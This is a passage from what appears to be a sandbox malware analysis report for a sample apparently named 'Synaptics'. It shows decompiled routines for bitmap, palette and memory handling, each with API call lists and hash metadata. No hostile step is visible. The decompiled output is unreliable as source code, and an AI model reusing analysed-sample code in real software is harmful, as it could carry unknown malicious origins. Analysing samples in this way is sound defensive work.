					_push(_v12);
					_push(_v16);
					L00407440();
				}
				return DeleteDC(_v16);
			}











                                                                                                                                                                                          0x00426f19
                                                                                                                                                                                          0x00426f1d
                                                                                                                                                                                          0x00426f26
                                                                                                                                                                                          0x00426f2d
                                                                                                                                                                                          0x00426f30
                                                                                                                                                                                          0x00426f32
                                                                                                                                                                                          0x00426f37
                                                                                                                                                                                          0x00426f3c
                                                                                                                                                                                          0x00426f3d
                                                                                                                                                                                          0x00426f42
                                                                                                                                                                                          0x00426f45
                                                                                                                                                                                          0x00426f4a
                                                                                                                                                                                          0x00426f4c
                                                                                                                                                                                          0x00426f4e
                                                                                                                                                                                          0x00426f4f
                                                                                                                                                                                          0x00426f52
                                                                                                                                                                                          0x00426f53
                                                                                                                                                                                          0x00426f58
                                                                                                                                                                                          0x00426f5e
                                                                                                                                                                                          0x00426f5f
                                                                                                                                                                                          0x00426f5f
                                                                                                                                                                                          0x00426f7d
                                                                                                                                                                                          0x00426f83
                                                                                                                                                                                          0x00426f86
                                                                                                                                                                                          0x00426f89
                                                                                                                                                                                          0x00426f92
                                                                                                                                                                                          0x00426f94
                                                                                                                                                                                          0x00426f99
                                                                                                                                                                                          0x00426f9d
                                                                                                                                                                                          0x00426f9e
                                                                                                                                                                                          0x00426f9e
                                                                                                                                                                                          0x00426fac

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00426DC0: GetObjectA.GDI32(?,00000054), ref: 00426DD4
                                                                                                                                                                                          • 73CCA590.GDI32(00000000), ref: 00426F32
                                                                                                                                                                                          • 73CCB410.GDI32(?,?,00000000,00000000,00426FAD,?,00000000), ref: 00426F53
                                                                                                                                                                                          • 73CCB150.GDI32(?,?,?,00000000,00000000,00426FAD,?,00000000), ref: 00426F5F
                                                                                                                                                                                          • GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 00426F76
                                                                                                                                                                                          • 73CCB410.GDI32(?,00000000,00000000,00426FB4,00000000,?,?,?,00000000,00000000,00426FAD,?,00000000), ref: 00426F9E
                                                                                                                                                                                          • DeleteDC.GDI32(?), ref: 00426FA7
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: B410$A590B150BitsDeleteObject
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3837315262-0
                                                                                                                                                                                          • Opcode ID: 923385af703c224445fe3f7018f1f50dd84332197b6e897708dbca319e94f8cc
                                                                                                                                                                                          • Instruction ID: 77de815d1256251625e09d43045054b0a879545964fd81c4b279a3d00da1559d
                                                                                                                                                                                          • Opcode Fuzzy Hash: 923385af703c224445fe3f7018f1f50dd84332197b6e897708dbca319e94f8cc
                                                                                                                                                                                          • Instruction Fuzzy Hash: C2114F75F082047FDB10DBA9DC41F9EBBECEB48714F5284AAB914E7281D678A900C769
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00473BA4 Relevance: 9.1, APIs: 6, Instructions: 65COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 45%
                                                                                                                                                                                          			E00473BA4(struct HBITMAP__* __eax, void* __ebx, struct tagBITMAPINFO* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, void* _a8) {
				char _v5;
				struct HDC__* _v12;
				struct HDC__* _v16;
				struct HDC__* _t29;
				struct tagBITMAPINFO* _t32;
				intOrPtr _t39;
				struct HBITMAP__* _t43;
				void* _t46;

				_t32 = __ecx;
				_t43 = __eax;
				E00473A5C(__eax, _a4, __ecx);
				_v12 = 0;
				_push(0);
				L004072E0();
				_v16 = 0;
				_push(_t46);
				_push(0x473c41);
				_push( *[fs:eax]);
				 *[fs:eax] = _t46 + 0xfffffff4;
				if(__edx != 0) {
					_push(0);
					_push(__edx);
					_t29 = _v16;
					_push(_t29);
					L00407440();
					_v12 = _t29;
					_push(_v16);
					L00407418();
				}
				_v5 = GetDIBits(_v16, _t43, 0, _t32->bmiHeader.biHeight, _a8, _t32, 0) != 0;
				_pop(_t39);
				 *[fs:eax] = _t39;
				_push(E00473C48);
				if(_v12 != 0) {
					_push(0);
					_push(_v12);
					_push(_v16);
					L00407440();
				}
				return DeleteDC(_v16);
			}











                                                                                                                                                                                          0x00473bad
                                                                                                                                                                                          0x00473bb1
                                                                                                                                                                                          0x00473bba
                                                                                                                                                                                          0x00473bc1
                                                                                                                                                                                          0x00473bc4
                                                                                                                                                                                          0x00473bc6
                                                                                                                                                                                          0x00473bcb
                                                                                                                                                                                          0x00473bd0
                                                                                                                                                                                          0x00473bd1
                                                                                                                                                                                          0x00473bd6
                                                                                                                                                                                          0x00473bd9
                                                                                                                                                                                          0x00473bde
                                                                                                                                                                                          0x00473be0
                                                                                                                                                                                          0x00473be2
                                                                                                                                                                                          0x00473be3
                                                                                                                                                                                          0x00473be6
                                                                                                                                                                                          0x00473be7
                                                                                                                                                                                          0x00473bec
                                                                                                                                                                                          0x00473bf2
                                                                                                                                                                                          0x00473bf3
                                                                                                                                                                                          0x00473bf3
                                                                                                                                                                                          0x00473c11
                                                                                                                                                                                          0x00473c17
                                                                                                                                                                                          0x00473c1a
                                                                                                                                                                                          0x00473c1d
                                                                                                                                                                                          0x00473c26
                                                                                                                                                                                          0x00473c28
                                                                                                                                                                                          0x00473c2d
                                                                                                                                                                                          0x00473c31
                                                                                                                                                                                          0x00473c32
                                                                                                                                                                                          0x00473c32
                                                                                                                                                                                          0x00473c40

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00473A5C: GetObjectA.GDI32(?,00000054,?), ref: 00473A75
                                                                                                                                                                                          • 73CCA590.GDI32(00000000,?,00000001,?), ref: 00473BC6
                                                                                                                                                                                          • 73CCB410.GDI32(?,00000000,00000000,00000000,00473C41,?,00000000,?,00000001,?), ref: 00473BE7
                                                                                                                                                                                          • 73CCB150.GDI32(?,?,00000000,00000000,00000000,00473C41,?,00000000,?,00000001,?), ref: 00473BF3
                                                                                                                                                                                          • GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 00473C0A
                                                                                                                                                                                          • 73CCB410.GDI32(?,?,00000000,00473C48,?,00000000,?,00000001,?), ref: 00473C32
                                                                                                                                                                                          • DeleteDC.GDI32(?), ref: 00473C3B
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: B410$A590B150BitsDeleteObject
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3837315262-0
                                                                                                                                                                                          • Opcode ID: 5a9e5f132f98f3c8b1375a2f7d4888768bc8b8b213a9d1ed075610753916ca03
                                                                                                                                                                                          • Instruction ID: 2e63988e96734921cea6db955d31d5c4bae8c35103de8be847097433fcca094d
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5a9e5f132f98f3c8b1375a2f7d4888768bc8b8b213a9d1ed075610753916ca03
                                                                                                                                                                                          • Instruction Fuzzy Hash: 4E114275E042047FDB11DFA98C42F9EBBEC9B48714F5084AAB918F7281D678AA009769
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00401B60 Relevance: 9.1, APIs: 6, Instructions: 62COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 71%
                                                                                                                                                                                          			E00401B60() {
				void* _t2;
				void* _t3;
				void* _t14;
				intOrPtr* _t19;
				intOrPtr _t23;
				intOrPtr _t26;
				intOrPtr _t28;

				_t26 = _t28;
				if( *0x49e5c4 == 0) {
					return _t2;
				} else {
					_push(_t26);
					_push(E00401C36);
					_push( *[fs:edx]);
					 *[fs:edx] = _t28;
					if( *0x49e04d != 0) {
						_push(0x49e5cc);
						L004013F8();
					}
					 *0x49e5c4 = 0;
					_t3 =  *0x49e624; // 0x7f2780
					LocalFree(_t3);
					 *0x49e624 = 0;
					_t19 =  *0x49e5ec; // 0x7f3db4
					while(_t19 != 0x49e5ec) {
						VirtualFree( *(_t19 + 8), 0, 0x8000);
						_t19 =  *_t19;
					}
					E00401460(0x49e5ec);
					E00401460(0x49e5fc);
					E00401460(0x49e628);
					_t14 =  *0x49e5e4; // 0x7f3780
					while(_t14 != 0) {
						 *0x49e5e4 =  *_t14;
						LocalFree(_t14);
						_t14 =  *0x49e5e4; // 0x7f3780
					}
					_pop(_t23);
					 *[fs:eax] = _t23;
					_push(0x401c3d);
					if( *0x49e04d != 0) {
						_push(0x49e5cc);
						L00401400();
					}
					_push(0x49e5cc);
					L00401408();
					return 0;
				}
			}










                                                                                                                                                                                          0x00401b61
                                                                                                                                                                                          0x00401b6b
                                                                                                                                                                                          0x00401c3f
                                                                                                                                                                                          0x00401b71
                                                                                                                                                                                          0x00401b73
                                                                                                                                                                                          0x00401b74
                                                                                                                                                                                          0x00401b79
                                                                                                                                                                                          0x00401b7c
                                                                                                                                                                                          0x00401b86
                                                                                                                                                                                          0x00401b88
                                                                                                                                                                                          0x00401b8d
                                                                                                                                                                                          0x00401b8d
                                                                                                                                                                                          0x00401b92
                                                                                                                                                                                          0x00401b99
                                                                                                                                                                                          0x00401b9f
                                                                                                                                                                                          0x00401ba6
                                                                                                                                                                                          0x00401bab
                                                                                                                                                                                          0x00401bc5
                                                                                                                                                                                          0x00401bbe
                                                                                                                                                                                          0x00401bc3
                                                                                                                                                                                          0x00401bc3
                                                                                                                                                                                          0x00401bd2
                                                                                                                                                                                          0x00401bdc
                                                                                                                                                                                          0x00401be6
                                                                                                                                                                                          0x00401beb
                                                                                                                                                                                          0x00401bf2
                                                                                                                                                                                          0x00401bf6
                                                                                                                                                                                          0x00401bfd
                                                                                                                                                                                          0x00401c02
                                                                                                                                                                                          0x00401c07
                                                                                                                                                                                          0x00401c0d
                                                                                                                                                                                          0x00401c10
                                                                                                                                                                                          0x00401c13
                                                                                                                                                                                          0x00401c1f
                                                                                                                                                                                          0x00401c21
                                                                                                                                                                                          0x00401c26
                                                                                                                                                                                          0x00401c26
                                                                                                                                                                                          0x00401c2b
                                                                                                                                                                                          0x00401c30
                                                                                                                                                                                          0x00401c35
                                                                                                                                                                                          0x00401c35

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • RtlEnterCriticalSection.KERNEL32(0049E5CC,00000000,00401C36), ref: 00401B8D
                                                                                                                                                                                          • LocalFree.KERNEL32(007F2780,00000000,00401C36), ref: 00401B9F
                                                                                                                                                                                          • VirtualFree.KERNEL32(?,00000000,00008000,007F2780,00000000,00401C36), ref: 00401BBE
                                                                                                                                                                                          • LocalFree.KERNEL32(007F3780,?,00000000,00008000,007F2780,00000000,00401C36), ref: 00401BFD
                                                                                                                                                                                          • RtlLeaveCriticalSection.KERNEL32(0049E5CC,00401C3D,007F2780,00000000,00401C36), ref: 00401C26
                                                                                                                                                                                          • RtlDeleteCriticalSection.KERNEL32(0049E5CC,00401C3D,007F2780,00000000,00401C36), ref: 00401C30
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3782394904-0
                                                                                                                                                                                          • Opcode ID: 9a617a2f0d30684659389e98b2415832446a369b62d9e9b97dd8d9c062a174d2
                                                                                                                                                                                          • Instruction ID: 63aebc4cd3b04fdf267fff4595653c8a60232739778a968a80e4263db5fe1b04
                                                                                                                                                                                          • Opcode Fuzzy Hash: 9a617a2f0d30684659389e98b2415832446a369b62d9e9b97dd8d9c062a174d2
                                                                                                                                                                                          • Instruction Fuzzy Hash: D111AC706042407EEB21EBA79D55B163BD8A71571CF91407BF004A62F2E67CAC00CB2E
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00426750 Relevance: 9.1, APIs: 6, Instructions: 55COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 87%
                                                                                                                                                                                          			E00426750(struct HDC__* __eax, signed int __ecx) {
				char _v1036;
				signed int _v1038;
				struct tagRGBQUAD _v1048;
				short _v1066;
				short* _t15;
				void* _t18;
				struct HDC__* _t23;
				void* _t26;
				short* _t31;
				short* _t32;

				_t31 = 0;
				 *_t32 = 0x300;
				if(__eax == 0) {
					_v1038 = __ecx;
					E004029DC(_t26, __ecx << 2,  &_v1036);
				} else {
					_push(0);
					L004072E0();
					_t23 = __eax;
					_t18 = SelectObject(__eax, __eax);
					_v1066 = GetDIBColorTable(_t23, 0, 0x100,  &_v1048);
					SelectObject(_t23, _t18);
					DeleteDC(_t23);
				}
				if(_v1038 != 0) {
					if(_v1038 != 0x10 || E004266B8(_t32) == 0) {
						E00426548( &_v1036, _v1038 & 0x0000ffff);
					}
					_t15 = _t32;
					_push(_t15);
					L00407308();
					_t31 = _t15;
				}
				return _t31;
			}













                                                                                                                                                                                          0x0042675b
                                                                                                                                                                                          0x0042675d
                                                                                                                                                                                          0x00426765
                                                                                                                                                                                          0x0042679f
                                                                                                                                                                                          0x004267ad
                                                                                                                                                                                          0x00426767
                                                                                                                                                                                          0x00426767
                                                                                                                                                                                          0x00426769
                                                                                                                                                                                          0x0042676e
                                                                                                                                                                                          0x00426772
                                                                                                                                                                                          0x0042678b
                                                                                                                                                                                          0x00426792
                                                                                                                                                                                          0x00426798
                                                                                                                                                                                          0x00426798
                                                                                                                                                                                          0x004267b8
                                                                                                                                                                                          0x004267c0
                                                                                                                                                                                          0x004267d6
                                                                                                                                                                                          0x004267d6
                                                                                                                                                                                          0x004267db
                                                                                                                                                                                          0x004267dd
                                                                                                                                                                                          0x004267de
                                                                                                                                                                                          0x004267e3
                                                                                                                                                                                          0x004267e3
                                                                                                                                                                                          0x004267f0

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • 73CCA590.GDI32(00000000,00000000,?,?,0042A2D3,?,?,?,?,00428DD3,00000000,00428E5F), ref: 00426769
                                                                                                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00426772
                                                                                                                                                                                          • GetDIBColorTable.GDI32(00000000,00000000,00000100,?,00000000,00000000,00000000,00000000,?,?,0042A2D3,?,?,?,?,00428DD3), ref: 00426786
                                                                                                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00426792
                                                                                                                                                                                          • DeleteDC.GDI32(00000000), ref: 00426798
                                                                                                                                                                                          • 73CCA8F0.GDI32(?,00000000,?,?,0042A2D3,?,?,?,?,00428DD3,00000000,00428E5F), ref: 004267DE
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ObjectSelect$A590ColorDeleteTable
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1056449717-0
                                                                                                                                                                                          • Opcode ID: e7d1ce7ffea08dbe9a9b300fc4b2c268702868957d9a1b5eb40c754f65446552
                                                                                                                                                                                          • Instruction ID: efc5091b96ee346cfcb1bb7471c8c7bb22fdf2c070b44c7d61a8e62d02ab9fa2
                                                                                                                                                                                          • Opcode Fuzzy Hash: e7d1ce7ffea08dbe9a9b300fc4b2c268702868957d9a1b5eb40c754f65446552
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8701847160832061E2246766AC43A6B72AC9FC0758F41882FB988A72C1E67C9845D3AB
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00425E34 Relevance: 9.0, APIs: 6, Instructions: 43COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E00425E34(void* __eax) {
				void* _t36;

				_t36 = __eax;
				UnrealizeObject(E00425610( *((intOrPtr*)(__eax + 0x14))));
				SelectObject( *(_t36 + 4), E00425610( *((intOrPtr*)(_t36 + 0x14))));
				if(E004256F0( *((intOrPtr*)(_t36 + 0x14))) != 0) {
					SetBkColor( *(_t36 + 4),  !(E00424950(E004255D4( *((intOrPtr*)(_t36 + 0x14))))));
					return SetBkMode( *(_t36 + 4), 1);
				} else {
					SetBkColor( *(_t36 + 4), E00424950(E004255D4( *((intOrPtr*)(_t36 + 0x14)))));
					return SetBkMode( *(_t36 + 4), 2);
				}
			}




                                                                                                                                                                                          0x00425e35
                                                                                                                                                                                          0x00425e40
                                                                                                                                                                                          0x00425e52
                                                                                                                                                                                          0x00425e61
                                                                                                                                                                                          0x00425e9b
                                                                                                                                                                                          0x00425eac
                                                                                                                                                                                          0x00425e63
                                                                                                                                                                                          0x00425e75
                                                                                                                                                                                          0x00425e86
                                                                                                                                                                                          0x00425e86

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00425610: CreateBrushIndirect.GDI32(00000000), ref: 004256BA
                                                                                                                                                                                          • UnrealizeObject.GDI32(00000000), ref: 00425E40
                                                                                                                                                                                          • SelectObject.GDI32(?,00000000), ref: 00425E52
                                                                                                                                                                                          • SetBkColor.GDI32(?,00000000), ref: 00425E75
                                                                                                                                                                                          • SetBkMode.GDI32(?,00000002), ref: 00425E80
                                                                                                                                                                                          • SetBkColor.GDI32(?,00000000), ref: 00425E9B
                                                                                                                                                                                          • SetBkMode.GDI32(?,00000001), ref: 00425EA6
                                                                                                                                                                                            • Part of subcall function 00424950: GetSysColor.USER32(00000000), ref: 0042495A
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Color$ModeObject$BrushCreateIndirectSelectUnrealize
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3527656728-0
                                                                                                                                                                                          • Opcode ID: 8e0a80b9ef8d8e5cf245cdc7e769ae7b4e37ba005f76f73da7a060884cd52786
                                                                                                                                                                                          • Instruction ID: f3953004702be4b33cbf574d844c3777e64eede3f5404583a563c06caea0bc6c
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8e0a80b9ef8d8e5cf245cdc7e769ae7b4e37ba005f76f73da7a060884cd52786
                                                                                                                                                                                          • Instruction Fuzzy Hash: AEF0BBB56001109BCE04FFBAE9C6E1B7B9C5F04309780845AB908EF297C979E850473A
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0042AE8C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 113windowCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 88%
                                                                                                                                                                                          			E0042AE8C(intOrPtr* __eax, void* __edx) {
				intOrPtr* _v8;
				struct HPALETTE__* _v12;
				char _v13;
				intOrPtr _v25;
				intOrPtr _v29;
				intOrPtr _v33;
				intOrPtr _v57;
				short _v59;
				short _v61;
				intOrPtr _v65;
				intOrPtr _v69;
				intOrPtr _v73;
				intOrPtr _v77;
				intOrPtr _v89;
				intOrPtr _v93;
				void _v97;
				void* _t44;
				void* _t46;
				intOrPtr _t49;
				void* _t54;
				struct HPALETTE__* _t56;
				void* _t70;
				void* _t72;
				void* _t73;
				struct HDC__* _t74;
				intOrPtr _t95;
				void* _t105;
				void* _t107;
				void* _t108;
				intOrPtr _t110;

				_t105 = _t107;
				_t108 = _t107 + 0xffffffa0;
				_t70 = __edx;
				_v8 = __eax;
				_t44 = E00429FC8(_v8);
				if(_t70 == _t44) {
					L16:
					return _t44;
				} else {
					_t46 = _t70 - 1;
					if(_t46 < 0) {
						_t44 =  *((intOrPtr*)( *_v8 + 0x6c))();
						goto L16;
					} else {
						if(_t46 == 7) {
							_t49 =  *0x49d90c; // 0x422ec0
							_t44 = E00425F28(_t49);
							goto L16;
						} else {
							E004032B4( &_v97, 0x54);
							_t54 = memcpy( &_v97,  *((intOrPtr*)(_v8 + 0x28)) + 0x18, 6 << 2);
							_t110 = _t108 + 0xc;
							_v13 = 0;
							_v77 = 0;
							_v73 = 0x28;
							_v69 = _v93;
							_v65 = _v89;
							_v61 = 1;
							_v59 =  *0x0049B8B3 & 0x000000ff;
							_t55 =  *((intOrPtr*)(_t54 + 0x10));
							_v12 =  *((intOrPtr*)(_t54 + 0x10));
							_t72 = _t70 - 2;
							if(_t72 == 0) {
								_t56 =  *0x49e894; // 0x790806c5
								_v12 = _t56;
							} else {
								_t73 = _t72 - 1;
								if(_t73 == 0) {
									_push(0);
									L00407638();
									_t74 = E00426060(_t55);
									_v12 = CreateHalftonePalette(_t74);
									_v13 = 1;
									_push(_t74);
									_push(0);
									L00407888();
								} else {
									if(_t73 == 2) {
										_v57 = 3;
										_v33 = 0xf800;
										_v29 = 0x7e0;
										_v25 = 0x1f;
									}
								}
							}
							 *[fs:eax] = _t110;
							 *((char*)(_v8 + 0x22)) = E00429AA8( *((intOrPtr*)( *_v8 + 0x64))( *[fs:eax], 0x42afd9, _t105),  &_v97) & 0xffffff00 | _v12 != 0x00000000;
							_pop(_t95);
							 *[fs:eax] = _t95;
							_push(0x42afe0);
							if(_v13 != 0) {
								return DeleteObject(_v12);
							}
							return 0;
						}
					}
				}
			}

































                                                                                                                                                                                          0x0042ae8d
                                                                                                                                                                                          0x0042ae8f
                                                                                                                                                                                          0x0042ae95
                                                                                                                                                                                          0x0042ae97
                                                                                                                                                                                          0x0042ae9d
                                                                                                                                                                                          0x0042aea4
                                                                                                                                                                                          0x0042afeb
                                                                                                                                                                                          0x0042aff1
                                                                                                                                                                                          0x0042aeaa
                                                                                                                                                                                          0x0042aeac
                                                                                                                                                                                          0x0042aeae
                                                                                                                                                                                          0x0042aebd
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0042aeb0
                                                                                                                                                                                          0x0042aeb2
                                                                                                                                                                                          0x0042aec5
                                                                                                                                                                                          0x0042aeca
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0042aeb4
                                                                                                                                                                                          0x0042aede
                                                                                                                                                                                          0x0042aef4
                                                                                                                                                                                          0x0042aef4
                                                                                                                                                                                          0x0042aef6
                                                                                                                                                                                          0x0042aefc
                                                                                                                                                                                          0x0042aeff
                                                                                                                                                                                          0x0042af09
                                                                                                                                                                                          0x0042af0f
                                                                                                                                                                                          0x0042af12
                                                                                                                                                                                          0x0042af23
                                                                                                                                                                                          0x0042af27
                                                                                                                                                                                          0x0042af2a
                                                                                                                                                                                          0x0042af2d
                                                                                                                                                                                          0x0042af30
                                                                                                                                                                                          0x0042af3d
                                                                                                                                                                                          0x0042af42
                                                                                                                                                                                          0x0042af32
                                                                                                                                                                                          0x0042af32
                                                                                                                                                                                          0x0042af34
                                                                                                                                                                                          0x0042af47
                                                                                                                                                                                          0x0042af49
                                                                                                                                                                                          0x0042af53
                                                                                                                                                                                          0x0042af5b
                                                                                                                                                                                          0x0042af5e
                                                                                                                                                                                          0x0042af62
                                                                                                                                                                                          0x0042af63
                                                                                                                                                                                          0x0042af65
                                                                                                                                                                                          0x0042af36
                                                                                                                                                                                          0x0042af39
                                                                                                                                                                                          0x0042af6c
                                                                                                                                                                                          0x0042af73
                                                                                                                                                                                          0x0042af7a
                                                                                                                                                                                          0x0042af81
                                                                                                                                                                                          0x0042af81
                                                                                                                                                                                          0x0042af39
                                                                                                                                                                                          0x0042af34
                                                                                                                                                                                          0x0042af93
                                                                                                                                                                                          0x0042afb9
                                                                                                                                                                                          0x0042afbe
                                                                                                                                                                                          0x0042afc1
                                                                                                                                                                                          0x0042afc4
                                                                                                                                                                                          0x0042afcd
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0042afd3
                                                                                                                                                                                          0x0042afd8
                                                                                                                                                                                          0x0042afd8
                                                                                                                                                                                          0x0042aeb2
                                                                                                                                                                                          0x0042aeae

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • 73CCAC50.USER32(00000000), ref: 0042AF49
                                                                                                                                                                                          • CreateHalftonePalette.GDI32(00000000,00000000), ref: 0042AF56
                                                                                                                                                                                          • 73CCB380.USER32(00000000,00000000,00000000,00000000), ref: 0042AF65
                                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 0042AFD3
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: B380CreateDeleteHalftoneObjectPalette
                                                                                                                                                                                          • String ID: (
                                                                                                                                                                                          • API String ID: 733450718-3887548279
                                                                                                                                                                                          • Opcode ID: 6fa3a017ba8cbe3547f1b59ddf4885941dcce5041652f42a4a6b682d81354657
                                                                                                                                                                                          • Instruction ID: 2a0d3ada1f03d7f2548bc3f3360be5a611323719477d61fc332258d066da6c8f
                                                                                                                                                                                          • Opcode Fuzzy Hash: 6fa3a017ba8cbe3547f1b59ddf4885941dcce5041652f42a4a6b682d81354657
                                                                                                                                                                                          • Instruction Fuzzy Hash: AE41F470B04208DFDB00DFA8D585B9EB7F6EF49304F9140AAE804A7391C67C5E15DB8A
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00475A94 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 67%
                                                                                                                                                                                          			E00475A94(char __eax, void* __ebx, void* __edi, void* __esi, void* __eflags) {
				char _v8;
				char _v268;
				long _v296;
				char _v304;
				char _v308;
				char _v312;
				char _v316;
				char _v320;
				void* _t50;
				void* _t53;
				void* _t60;
				intOrPtr _t67;
				void* _t78;
				void* _t81;
				void* _t84;

				_push(__ebx);
				_push(__esi);
